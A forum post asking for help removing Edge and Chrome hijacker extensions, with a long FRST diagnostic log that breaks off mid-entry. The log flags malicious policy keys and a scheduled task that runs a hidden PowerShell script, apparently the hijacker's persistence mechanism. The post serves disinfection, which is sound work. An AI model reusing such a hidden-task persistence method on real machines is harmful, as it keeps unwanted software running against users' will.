Log analysis and evaluation: Windows 11: Policy in Edge and Chrome browsers cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension
23.07.2024, 13:38 | #1 |
Windows 11: Policy in Edge and Chrome browsers cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension

Hello everyone,

on our family computer we have apparently picked up two browser hijackers:

Symptoms:

Edge:
1. Edge browser policy (edge://policy) ExtensionInstallForceList keeps re-enabling itself
2. Edge extension "Beautiful New Tab" installs itself on its own and cannot be disabled or deleted

Chrome:
1. Chrome browser policy (Chrome://policy) ExtensionInstallForceList keeps re-enabling itself
2. Chrome extension "Qtr Search" installs itself on its own and cannot be disabled or deleted

Previous unsuccessful attempts at a solution:
1. Scans with Windows Defender
2. Scans with Malwarebytes Anti-Malware & adwcleaner

Observations:
1. The "Beautiful New Tab" extension writes itself into the registry at: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist
2. The "Qtr Search" extension writes itself into the registry at: Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist
3. Deleting the entire key incl. "ExtensionInstallforceList" works at least to the extent that the message "Managed by your organization" in the Edge browser disappears for some time (period not measured, possibly approx. 1 h or less). After that, "Managed by your organization" appears again.

The "ApplicationInstallForceList" policy still keeps re-enabling itself...

Environment:
- Windows 11 Home
- Current patch level
- Windows Defender active, up to date and configured as described on Trojaner-Board
- No Defender Application Guard (service not installed)

FRST Log:
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 21.07.2024 durchgeführt von skysc (Administrator) auf SKYSGAMINGPC-CA (Micro-Star International Co., Ltd. MS-7C56) (22-07-2024 21:17:59) Gestartet von C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe Geladene Profile: skysc Plattform: Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) Sprache: Deutsch (Deutschland) Standard-Browser: Edge Start-Modus: Normal ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> Micro-Star INT'L CO., LTD.) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p\DCv2\DCv2.exe (Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler.exe (Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\1.3.361.151\BraveCrashHandler64.exe (C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Engine\Binaries\Win64\EpicWebHelper.exe <2> (C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Engine\CC_Engine_x64.exe (C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) 
C:\Program Files (x86)\MSI\MSI Center\MSI.CentralServer.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.254.0.13\OverwolfHelper.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Common Files\Overwolf\0.254.0.13\OverwolfHelper64.exe (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe <4> (C:\Program Files (x86)\Overwolf\Overwolf.exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Users\skysc\AppData\Local\Overwolf\ProcessCache\0.254.0.13\cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj\curseforge.exe (C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7> (C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3> (C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.AlwaysOnTop.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.Awake.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.ColorPickerUI.exe 
(C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.CropAndLock.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (C:\Program Files\PowerToys\PowerToys.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\WinUI3Apps\PowerToys.Peek.UI.exe (C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe <6> (C:\Users\skysc\AppData\Local\Programs\Opera GX\opera.exe ->) (Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\109.0.5097.142\opera_crashreporter.exe (Discord Inc. -> Discord Inc.) C:\ProgramData\skysc\Discord\app-1.0.9154\Discord.exe <6> (explorer.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe (explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <7> (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe (explorer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\regedit.exe (explorer.exe ->) (Moonsworth, LLC -> Moonsworth LLC) C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe <4> (explorer.exe ->) (Valve Corp. 
-> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe (explorer.exe ->) (VideoLAN -> VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <10> (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\opera.exe <41> (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe (services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (services.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe (services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) 
C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe (services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe (services.exe ->) (NortonLifeLock Inc. -> NortonLifelock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe <2> (services.exe ->) (NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3> (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe <2> (services.exe ->) (RealDefense, LLC -> SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe (services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe (services.exe ->) (Samsung Electronics CO., LTD. -> ) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe (services.exe ->) (Valve Corp. 
-> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe (sihost.exe ->) (6099D0EF-9374-47ED-BDFE-A82136831235 -> File-New-Project) C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne\EarTrumpet\EarTrumpet.exe (svchost.exe ->) (A225F3B5-240D-4EE9-BCF4-697A07F5E93E -> ) C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p\Gamebar_Widget.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileCoAuth.exe (svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\WidgetService.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <10> (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\LocationNotificationWindows.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\Packages\Preview\amd64\MoUsoCoreWorker.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.TerminalServer.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) 
C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Speed Up\StorageMonitor.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\True Color\New\MSI.True Color.exe (svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Engine.exe ==================== Registry (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe [1945544 2024-02-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [MSIRegister] => C:\Program Files (x86)\MSI\MSIRegister\MSIRegister.exe [1266864 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4407656 2024-07-17] (Valve Corp. 
-> Valve Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Stable] => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1832968 2024-07-08] (Overwolf Ltd -> Overwolf Ltd.) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37550568 2024-06-21] (Epic Games Inc. -> Epic Games, Inc.) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Discord] => C:\ProgramData\skysc\Discord\Update.exe [1525024 2023-11-06] (Discord Inc. 
-> GitHub) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [] => [X] HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [11248160 2024-04-29] (RealDefense LLC -> SUPERAntiSpyware) HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Lunar Client] => C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe [176849464 2024-07-22] (Moonsworth, LLC -> Moonsworth LLC) HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [MicrosoftEdgeAutoLaunch_B751ED54CA5804D0129CEDA4AA0FE63C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (Keine Datei) HKU\S-1-5-18\...\Run: [Norton Download ManagerFORCE_UPGRADE_22_23_5] => C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.23.5" (Keine Datei) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\126.0.6478.182\Installer\chrmstp.exe [2024-07-17] (Google LLC -> Google LLC) HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program 
Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\Installer\chrmstp.exe [2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.) HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {31A29B33-2F9D-4E5A-B113-C2F9AE0A2F8D} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.) Task: {FFF40F90-C4A9-480F-AF6F-95D6FE70C03E} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.) 
Task: {8FE0E829-5739-4830-B8A4-8EADE5477709} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem128.0.6597.0{08699C9D-C6E5-410E-854E-9120298296B0} => C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe [4889704 2024-07-15] (Google LLC -> Google LLC) Task: {7FE0D883-DA2A-4259-AA1B-F2D690708800} - System32\Tasks\KondSerp_OptimizerV2 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [450560 2024-02-14] (Microsoft Windows -> Microsoft Corporation) -> -File C:/Windows/System32/KondSerp_Optimizer.ps1 <==== ACHTUNG Task: {C4F8F6AF-D8BB-46EB-BA88-43F5FDF7B4B3} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation) Task: {506BA0A8-DADC-4595-B0DA-A7691B71C178} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation) Task: {4EE6DC46-FA2C-42D4-A227-D1C2A6DDD040} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Task: {56EC0CC9-972B-4DAD-9FA5-3B9402190B3A} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation) Task: {880B02F1-E7D2-498A-9A96-8D3CAE66DE9D} - System32\Tasks\Microsoft\Windows\Application Experience\PcaWallpaperAppDetect => C:\Windows\system32\rundll32.exe [90112 2024-07-09] (Microsoft Windows -> Microsoft Corporation) -> %windir%\system32\PcaSvc.dll,PcaWallpaperAppDetect Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => 
%systemroot%\system32\MusNotification.exe (Keine Datei) Task: {28ABD9F2-6737-46AD-8E0C-DDC433A2E213} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {EF0A3A8E-574C-4DCB-BFF6-6812FDD96FDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {BF3E2465-DBAF-44DE-9296-EBE42160D27D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {EEBEA335-5213-497F-BC43-9876DE8688BC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {B0F24A60-5E79-4210-B730-A2F79708048A} - System32\Tasks\MSI Task Host - LEDKeeper2_Host => C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe [2676840 2023-12-14] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) Task: {357123E4-3248-405C-B227-A69F3326D479} - System32\Tasks\MSI Task Host - MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe [81208 2021-09-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> ) Task: {AC26D83B-FCAF-453F-95DE-FE3F8465C2AA} - System32\Tasks\MSI Task Host - TraceFPS => C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe [2780144 2021-01-25] (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.) 
Task: {4BD989F5-A0B9-437E-81EE-C28C6C688B44} - System32\Tasks\MSI_GamebarConnect => "C:\Program Files (x86)\MSI\MSI Companion\Gamebar_Connect.exe" -run (Keine Datei) Task: {BE288D1C-D22E-4A65-B6A3-CE0B3052224E} - System32\Tasks\MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe [119392 2023-08-07] (MICRO-STAR INTERNATIONAL CO., LTD. -> ) Task: {1C40815B-A056-4AC2-A931-091E03CB0218} - System32\Tasks\MSI_Toast_Server => C:\Program Files (x86)\MSI\MSI Toast Server\MSIToastServer.exe [31904 2019-03-05] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) Task: {70F898CB-5077-4047-A303-A8EBC1F66A90} - System32\Tasks\MSI_TraceFPS => "C:\Program Files (x86)\MSI\MSI Companion\MSI_TraceFPS.exe" (Keine Datei) Task: {3F3A6A2A-6264-4493-A43D-B8A22A01190E} - System32\Tasks\Norton 360\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) Task: {CA54FDB8-6128-47BD-A0ED-C9D0BBDC5708} - System32\Tasks\Norton 360\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) Task: {85460D07-DD81-48AC-9DB8-FAEDDD9E4A9C} - System32\Tasks\Norton 360\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) Task: {0700D5B1-102A-4893-9ADA-7185056261A3} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.24.2.6\WSCStub.exe [646520 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.) 
Task: {215D98A3-22CF-401A-B072-0FE3E4252469} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1005096 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files\NVIDIA Corporation\NvContainer\-d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {CB09D936-04C5-49C6-91A5-CD343A8088D7} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3345448 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {6046E66B-556D-4BB5-96D7-FDFB29791D41} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files (x86)\NVIDIA Corporation\NvNode\--launcher=TaskScheduler Task: {95330FA2-42F5-4B9D-BCDD-CC2BC8E9858B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {EFCC5B6E-BB1B-4CFD-B824-89EA3F22A919} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {EFDA8A96-B078-491E-9E03-8E76DE56ABD2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {B0B1CF3B-E160-45F4-8767-2446FF93B44B} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA 
Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {B43D8D56-45EB-4D1E-91B8-63CF957E1173} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {833377F9-8375-488D-9096-CF4605EB48C5} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) Task: {15469283-290A-4C91-A80D-973776316BD4} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation) Task: {54E56090-CE3D-4B15-A9F5-A7DA596CFE18} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1000 => C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (Keine Datei) Task: {3246FB24-FF9D-4B54-95BD-653EE03503A7} 